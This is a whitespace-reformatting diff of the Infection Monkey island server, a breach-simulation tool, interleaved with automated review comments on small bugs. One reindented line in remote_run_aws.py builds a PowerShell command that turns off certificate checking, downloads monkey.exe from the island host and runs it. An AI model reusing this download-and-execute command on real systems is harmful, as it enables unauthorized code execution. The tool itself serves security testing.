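Review bot: The reindented handler block keeps `"filename": "info.log"` as a bare relative path, so the rotating log file ends up in whatever working directory the island process was started from rather than at a fixed location. The main.py hunk later in this diff already anchors the config file itself on MONKEY_ISLAND_ABS_PATH, so I would expect the log path to be anchored the same way — either an absolute path here or a path resolved by `json_setup_logging` before the dict is handed to the logging machinery; that function is not visible in this diff, so this may already be handled there. Separately, the file still ends with `\ No newline at end of file`, which a pure formatting pass is the natural place to fix.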
diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index 324903809..8d0ed42ad 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -43,6 +43,7 @@ class Monkey(Document): tunnel = ReferenceField("self") command_control_channel = EmbeddedDocumentField(CommandControlChannel) aws_instance_id = StringField(required=False) # This field only exists when the monkey is running on an AWS + # instance. See https://github.com/guardicore/monkey/issues/426. @staticmethod diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 3c10ca7d7..0d12f9785 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -188,4 +188,3 @@ class TestMonkey(IslandTestCase): cache_info_after_query = Monkey.is_monkey.storage.backend.cache_info() self.assertEqual(cache_info_after_query.hits, 2) - diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index d61478641..c7190d0f1 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -14,6 +14,7 @@ class TestFinding(IslandTestCase): Also, the working directory needs to be the working directory from which you usually run the island so the server.json file is found and loaded. """ + def test_save_finding_validation(self): self.fail_if_not_testing_env() self.clean_finding_db() diff --git a/monkey/monkey_island/cc/resources/attack/attack_config.py b/monkey/monkey_island/cc/resources/attack/attack_config.py index da7651f24..803fb5453 100644 --- a/monkey/monkey_island/cc/resources/attack/attack_config.py +++ b/monkey/monkey_island/cc/resources/attack/attack_config.py 
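Review bot: The added line `# instance. See https://github.com/guardicore/monkey/issues/426.` continues a sentence that begins in the trailing comment on the `aws_instance_id` field, so on its own it reads as a fragment and any future wrap will keep splitting it the same way. Put the whole sentence above the field instead: `# Only set when the monkey runs on an AWS instance; see https://github.com/guardicore/monkey/issues/426.` and drop the trailing comment. I am assuming the old trailing comment simply stopped at "running on an AWS"; the hunk shows it only as context.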
@@ -27,4 +27,3 @@ class AttackConfiguration(flask_restful.Resource): AttackConfig.update_config({'properties': json.loads(request.data)}) AttackConfig.apply_to_monkey_config() return {} - diff --git a/monkey/monkey_island/cc/resources/local_run.py b/monkey/monkey_island/cc/resources/local_run.py index 54a16f518..41f5fa417 100644 --- a/monkey/monkey_island/cc/resources/local_run.py +++ b/monkey/monkey_island/cc/resources/local_run.py @@ -16,6 +16,7 @@ from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH __author__ = 'Barak' import logging + logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/resources/monkey.py b/monkey/monkey_island/cc/resources/monkey.py index 8e523a8a7..3e3ef40c0 100644 --- a/monkey/monkey_island/cc/resources/monkey.py +++ b/monkey/monkey_island/cc/resources/monkey.py @@ -13,6 +13,7 @@ from monkey_island.cc.services.node import NodeService __author__ = 'Barak' + # TODO: separate logic from interface diff --git a/monkey/monkey_island/cc/resources/netmap.py b/monkey/monkey_island/cc/resources/netmap.py index ed83414f5..3b7e471d8 100644 --- a/monkey/monkey_island/cc/resources/netmap.py +++ b/monkey/monkey_island/cc/resources/netmap.py @@ -27,5 +27,3 @@ class NetMap(flask_restful.Resource): "nodes": monkeys + nodes + monkey_island, "edges": edges } - - diff --git a/monkey/monkey_island/cc/resources/pba_file_download.py b/monkey/monkey_island/cc/resources/pba_file_download.py index 5b567e8e4..de85fc291 100644 --- a/monkey/monkey_island/cc/resources/pba_file_download.py +++ b/monkey/monkey_island/cc/resources/pba_file_download.py @@ -9,6 +9,7 @@ class PBAFileDownload(flask_restful.Resource): """ File download endpoint used by monkey to download user's PBA file """ + # Used by monkey. can't secure. def get(self, path): return send_from_directory(GET_FILE_DIR, path) diff --git a/monkey/monkey_island/cc/resources/pba_file_upload.py b/monkey/monkey_island/cc/resources/pba_file_upload.py index 0d924a742..3a636459c 100644 
--- a/monkey/monkey_island/cc/resources/pba_file_upload.py +++ b/monkey/monkey_island/cc/resources/pba_file_upload.py @@ -21,6 +21,7 @@ class FileUpload(flask_restful.Resource): """ File upload endpoint used to exchange files with filepond component on the front-end """ + @jwt_required() def get(self, file_type): """ diff --git a/monkey/monkey_island/cc/resources/reporting/report.py b/monkey/monkey_island/cc/resources/reporting/report.py index 5b416e60b..961e745a8 100644 --- a/monkey/monkey_island/cc/resources/reporting/report.py +++ b/monkey/monkey_island/cc/resources/reporting/report.py @@ -1,6 +1,5 @@ import http.client - import flask_restful from flask import jsonify @@ -28,10 +27,10 @@ class Report(flask_restful.Resource): elif report_type == ZERO_TRUST_REPORT_TYPE: if report_data == REPORT_DATA_PILLARS: return jsonify({ - "statusesToPillars": ZeroTrustService.get_statuses_to_pillars(), - "pillarsToStatuses": ZeroTrustService.get_pillars_to_statuses(), - "grades": ZeroTrustService.get_pillars_grades() - } + "statusesToPillars": ZeroTrustService.get_statuses_to_pillars(), + "pillarsToStatuses": ZeroTrustService.get_pillars_to_statuses(), + "grades": ZeroTrustService.get_pillars_grades() + } ) elif report_data == REPORT_DATA_PRINCIPLES_STATUS: return jsonify(ZeroTrustService.get_principles_status()) diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/resources/representations_test.py index 714c70ed2..c50394117 100644 --- a/monkey/monkey_island/cc/resources/representations_test.py +++ b/monkey/monkey_island/cc/resources/representations_test.py @@ -37,12 +37,12 @@ class TestJsonRepresentations(TestCase): # dicts and lists self.assertEqual({ - "a": [ - {"ba": obj_id_str, - "bb": obj_id_str} - ], - "b": {"id": obj_id_str} - }, + "a": [ + {"ba": obj_id_str, + "bb": obj_id_str} + ], + "b": {"id": obj_id_str} + }, normalize_obj({ "a": [ {"ba": bson.objectid.ObjectId(obj_id_str), 
diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index a655c5f9f..8a8c750b4 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py @@ -22,8 +22,8 @@ class TelemetryFeed(flask_restful.Resource): if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}})\ - + telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) \ + \ telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) try: diff --git a/monkey/monkey_island/cc/resources/test/log_test.py b/monkey/monkey_island/cc/resources/test/log_test.py index e592e7214..ef4ff708d 100644 --- a/monkey/monkey_island/cc/resources/test/log_test.py +++ b/monkey/monkey_island/cc/resources/test/log_test.py @@ -2,7 +2,6 @@ from bson import json_util import flask_restful from flask import request - from monkey_island.cc.auth import jwt_required from monkey_island.cc.database import mongo, database diff --git a/monkey/monkey_island/cc/server_config.json b/monkey/monkey_island/cc/server_config.json index 0b28d0b74..420f1b303 100644 --- a/monkey/monkey_island/cc/server_config.json +++ b/monkey/monkey_island/cc/server_config.json @@ -1,4 +1,4 @@ { - "server_config": "standard", - "deployment": "develop" + "server_config": "standard", + "deployment": "develop" } diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index 1c18f7654..10005bd26 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py 
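Review bot: The dangling line continuation after the `find(...)` call survives on the new side — the added line holding a lone `\` continues into the blank context line and contributes nothing — so the reformat preserved a leftover instead of removing it. Drop both backslashes: `telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}})`. The enclosing method starts before the hunk and continues past the `try:` on its last line.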
@@ -10,7 +10,6 @@ from monkey_island.cc.services.reporting.report_generation_synchronisation impor __author__ = "VakarisZ" - LOG = logging.getLogger(__name__) TECHNIQUES = {'T1210': T1210.T1210, @@ -52,7 +51,7 @@ class AttackReportService: Generates new report based on telemetries, replaces old report in db with new one. :return: Report object """ - report =\ + report = \ { 'techniques': {}, 'meta': {'latest_monkey_modifytime': Monkey.get_latest_modifytime()}, diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py index 2b49f264d..8039a2e76 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1003(AttackTechnique): - tech_id = "T1003" unscanned_msg = "Monkey tried to obtain credentials from systems in the network but didn't find any or failed." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py index b84fe4a6f..2a39fad02 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py @@ -5,7 +5,6 @@ __author__ = "VakarisZ" class T1005(AttackTechnique): - tech_id = "T1005" unscanned_msg = "Monkey didn't gather any sensitive data from local system." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py index 43d7c42b0..9249020dc 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py 
@@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1016(AttackTechnique): - tech_id = "T1016" unscanned_msg = "Monkey didn't gather network configurations." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py index a955f6cc9..3498029c9 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1018(AttackTechnique): - tech_id = "T1018" unscanned_msg = "Monkey didn't find any machines on the network." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py index d22583359..3fc29259b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py @@ -3,7 +3,6 @@ from monkey_island.cc.services.attack.technique_reports import AttackTechnique from common.utils.attack_utils import ScanStatus from monkey_island.cc.services.attack.technique_reports.technique_report_tools import parse_creds - __author__ = "VakarisZ" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py index 1342b646e..ae3342355 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1041(AttackTechnique): - tech_id = "T1041" unscanned_msg = "Monkey didn't exfiltrate any info trough command and control channel." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py index ef15dd9fd..a2eb3ffd0 100644 
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1059(AttackTechnique): - tech_id = "T1059" unscanned_msg = "Monkey didn't exploit any machines to run commands at." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py index 7d8ceb93e..f8eb9aa3e 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1065(AttackTechnique): - tech_id = "T1065" unscanned_msg = "" scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py index 623d157ae..655da767d 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1075(AttackTechnique): - tech_id = "T1075" unscanned_msg = "Monkey didn't try to use pass the hash attack." scanned_msg = "Monkey tried to use hashes while logging in but didn't succeed." diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py index bc2645bb9..726910789 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1082(AttackTechnique): - tech_id = "T1082" unscanned_msg = "Monkey didn't gather any system info on the network." scanned_msg = "" 
@@ -22,17 +21,17 @@ class T1082(AttackTechnique): {'$project': {'_id': 0, 'machine': 1, 'collections': [ - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$aws', {}]}]}, - 'name': {'$literal': 'Amazon Web Services info'}}, - {'used': {'$and': [{'$ifNull': ['$process_list', False]}, {'$gt': ['$process_list', {}]}]}, - 'name': {'$literal': 'Running process list'}}, - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$ne': ['$netstat', []]}]}, - 'name': {'$literal': 'Network connections'}}, - {'used': {'$and': [{'$ifNull': ['$ssh_info', False]}, {'$ne': ['$ssh_info', []]}]}, - 'name': {'$literal': 'SSH info'}}, - {'used': {'$and': [{'$ifNull': ['$azure_info', False]}, {'$ne': ['$azure_info', []]}]}, - 'name': {'$literal': 'Azure info'}} - ]}}, + {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$aws', {}]}]}, + 'name': {'$literal': 'Amazon Web Services info'}}, + {'used': {'$and': [{'$ifNull': ['$process_list', False]}, {'$gt': ['$process_list', {}]}]}, + 'name': {'$literal': 'Running process list'}}, + {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$ne': ['$netstat', []]}]}, + 'name': {'$literal': 'Network connections'}}, + {'used': {'$and': [{'$ifNull': ['$ssh_info', False]}, {'$ne': ['$ssh_info', []]}]}, + 'name': {'$literal': 'SSH info'}}, + {'used': {'$and': [{'$ifNull': ['$azure_info', False]}, {'$ne': ['$azure_info', []]}]}, + 'name': {'$literal': 'Azure info'}} + ]}}, {'$group': {'_id': {'machine': '$machine', 'collections': '$collections'}}}, {"$replaceRoot": {"newRoot": "$_id"}}] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py index dd5d64d25..fe4b6ccec 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py 
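Review bot: In the reindented `collections` list the entry labelled 'Amazon Web Services info' tests `{'$ifNull': ['$netstat', False]}` but then compares `$aws`, so its `used` flag depends on whether netstat data exists rather than whether AWS data exists; every other entry checks the same field in both clauses, which makes this look like a copy-paste slip carried over by the reformat. It should read `{'used': {'$and': [{'$ifNull': ['$aws', False]}, {'$gt': ['$aws', {}]}]},`. The aggregation pipeline this belongs to starts before the hunk, so I cannot see where `$aws` is projected from.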
@@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1086(AttackTechnique): - tech_id = "T1086" unscanned_msg = "Monkey didn't run powershell." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py index 7a6c830b8..f5702ede8 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1090(AttackTechnique): - tech_id = "T1090" unscanned_msg = "Monkey didn't use connection proxy." scanned_msg = "" @@ -20,5 +19,3 @@ class T1090(AttackTechnique): data = T1090.get_base_data_by_status(status) data.update({'proxies': monkeys}) return data - - diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py index 3d95fd88d..6ae8037bc 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py @@ -5,7 +5,6 @@ __author__ = "VakarisZ" class T1105(AttackTechnique): - tech_id = "T1105" unscanned_msg = "Monkey didn't try to copy files to any systems." scanned_msg = "Monkey tried to copy files, but failed." diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py index 72bb0af76..a28dc5aeb 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py @@ -46,5 +46,3 @@ class T1110(AttackTechnique): data.update({'services': attempts}) return data - - diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py index 32187696a..3959302fa 100644 
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1188(AttackTechnique): - tech_id = "T1188" unscanned_msg = "Monkey didn't use multi-hop proxy." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py index eeae183f5..5b9a23c62 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1210(AttackTechnique): - tech_id = "T1210" unscanned_msg = "Monkey didn't scan any remote services. Maybe it didn't find any machines on the network?" scanned_msg = "Monkey scanned for remote services on the network, but couldn't exploit any of them." @@ -30,8 +29,8 @@ class T1210(AttackTechnique): @staticmethod def get_scanned_services(): results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'scan'}}, - {'$sort': {'data.service_count': -1}}, - {'$group': { + {'$sort': {'data.service_count': -1}}, + {'$group': { '_id': {'ip_addr': '$data.machine.ip_addr'}, 'machine': {'$first': '$data.machine'}, 'time': {'$first': '$timestamp'}}}]) diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 641da8055..41c218099 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -15,7 +15,6 @@ __author__ = "itay.mizeretz" logger = logging.getLogger(__name__) - # This should be used for config values of array type (array of strings only) ENCRYPTED_CONFIG_ARRAYS = \ [ 
@@ -266,11 +265,11 @@ class ConfigService: # Check if array of shh key pairs and then decrypt if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]: config_arr[i] = ConfigService.decrypt_ssh_key_pair(config_arr[i]) if is_decrypt else \ - ConfigService.decrypt_ssh_key_pair(config_arr[i], True) + ConfigService.decrypt_ssh_key_pair(config_arr[i], True) else: config_arr[i] = encryptor.dec(config_arr[i]) if is_decrypt else encryptor.enc(config_arr[i]) else: - parent_config_arr[config_arr_as_array[-1]] =\ + parent_config_arr[config_arr_as_array[-1]] = \ encryptor.dec(config_arr) if is_decrypt else encryptor.enc(config_arr) @staticmethod diff --git a/monkey/monkey_island/cc/services/database.py b/monkey/monkey_island/cc/services/database.py index 62e370e44..7062d71c3 100644 --- a/monkey/monkey_island/cc/services/database.py +++ b/monkey/monkey_island/cc/services/database.py @@ -6,7 +6,6 @@ from monkey_island.cc.services.post_breach_files import remove_PBA_files from flask import jsonify from monkey_island.cc.database import mongo - logger = logging.getLogger(__name__) @@ -28,4 +27,3 @@ class Database(object): def init_db(): if not mongo.db.collection_names(): Database.reset_db() - diff --git a/monkey/monkey_island/cc/services/island_logs.py b/monkey/monkey_island/cc/services/island_logs.py index 77b28bdd4..be6aae12d 100644 --- a/monkey/monkey_island/cc/services/island_logs.py +++ b/monkey/monkey_island/cc/services/island_logs.py @@ -1,4 +1,5 @@ import logging + __author__ = "Maor.Rayzin" logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/services/mimikatz_utils.py b/monkey/monkey_island/cc/services/mimikatz_utils.py index 4b88473fe..e2ab8ec10 100644 --- a/monkey/monkey_island/cc/services/mimikatz_utils.py +++ b/monkey/monkey_island/cc/services/mimikatz_utils.py @@ -1,4 +1,3 @@ - __author__ = 'maor.rayzin' 
diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index c81e0bc4a..9627bf74c 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -130,7 +130,7 @@ class RemoteRunAwsService: return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index f0b6bdb6a..19293f991 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -208,9 +208,9 @@ class AWSExporter(Exporter): description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -224,8 +224,8 @@ class AWSExporter(Exporter): description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -269,7 +269,7 @@ class AWSExporter(Exporter): recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -284,9 +284,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -301,9 +301,9 @@ class AWSExporter(Exporter): "network.", recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -318,9 +318,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -361,7 +361,7 @@ class AWSExporter(Exporter): description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " "machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) diff --git a/monkey/monkey_island/cc/services/reporting/exporter_init.py b/monkey/monkey_island/cc/services/reporting/exporter_init.py index f64d4b4aa..903af1628 100644 --- a/monkey/monkey_island/cc/services/reporting/exporter_init.py +++ b/monkey/monkey_island/cc/services/reporting/exporter_init.py 
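Review bot: The two WMI recommendation strings in this file section (this hunk and the one at `@@ -318`) read `"The machine machine ({ip_address}) is vulnerable to a WMI attack..."` and never consume the `machine=issue['machine']` keyword that the hunk reindents, so the exported finding literally says "machine machine" and omits the hostname; `str.format` ignores unused keyword arguments, which is why nothing fails. Change `The machine machine ({ip_address})` to `The machine {machine} ({ip_address})` in both literals and leave the keyword lines as they are. The string literals sit in the context lines just above the reindented `.format(` arguments, and the enclosing methods start outside the hunks.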
@@ -4,6 +4,7 @@ from monkey_island.cc.services.reporting.report_exporter_manager import ReportEx
 from monkey_island.cc.services.reporting.aws_exporter import AWSExporter
 from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService
 from monkey_island.cc.environment.environment import env
+
 logger = logging.getLogger(__name__)
diff --git a/monkey/monkey_island/cc/services/reporting/test_pth_report.py b/monkey/monkey_island/cc/services/reporting/test_pth_report.py
index 7c709f862..b5a628fb1 100644
--- a/monkey/monkey_island/cc/services/reporting/test_pth_report.py
+++ b/monkey/monkey_island/cc/services/reporting/test_pth_report.py
@@ -64,6 +64,3 @@ class TestPTHReportServiceGenerateMapNodes(IslandTestCase):
 self.assertEqual(map_nodes[0]["group"], "critical")
 self.assertEqual(len(map_nodes[0]["services"]), 2)
 self.assertEqual(map_nodes[0]["hostname"], hostname)
-
-
-
diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py
index a43da8416..98b99ac13 100644
--- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py
+++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py
@@ -306,7 +306,7 @@ class TestZeroTrustService(IslandTestCase):
 def compare_lists_no_order(s, t):
- t = list(t) # make a mutable copy
+ t = list(t) # make a mutable copy
 try:
 for elem in s: t.remove(elem)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
index b0e2eb8b7..e6ac8734b 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
@@ -24,4 +24,3 @@ def process_post_breach_telemetry(telemetry_json):
 post_breach_action_name = telemetry_json["data"]["name"]
 if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS:
 POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json)
-
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py
index b4efd3c3a..626a4cc52 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py
@@ -9,7 +9,7 @@ from monkey_island.cc.models.zero_trust.segmentation_finding import Segmentation
 from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups
 SEGMENTATION_DONE_EVENT_TEXT = "Monkey on {hostname} is done attempting cross-segment communications " \
- "from `{src_seg}` segments to `{dst_seg}` segments."
+ "from `{src_seg}` segments to `{dst_seg}` segments."
 SEGMENTATION_VIOLATION_EVENT_TEXT = \
 "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " \
@@ -101,8 +101,8 @@ def get_segmentation_done_event(current_monkey, subnet_pair):
 return Event.create_event(
 title="Segmentation test done",
 message=SEGMENTATION_DONE_EVENT_TEXT.format(
- hostname=current_monkey.hostname,
- src_seg=subnet_pair[0],
- dst_seg=subnet_pair[1]),
+ hostname=current_monkey.hostname,
+ src_seg=subnet_pair[0],
+ dst_seg=subnet_pair[1]),
 event_type=EVENT_TYPE_MONKEY_NETWORK
 )
diff --git a/monkey/monkey_island/cc/services/version_update.py b/monkey/monkey_island/cc/services/version_update.py
index 3d43017f6..c1dab52a9 100644
--- a/monkey/monkey_island/cc/services/version_update.py
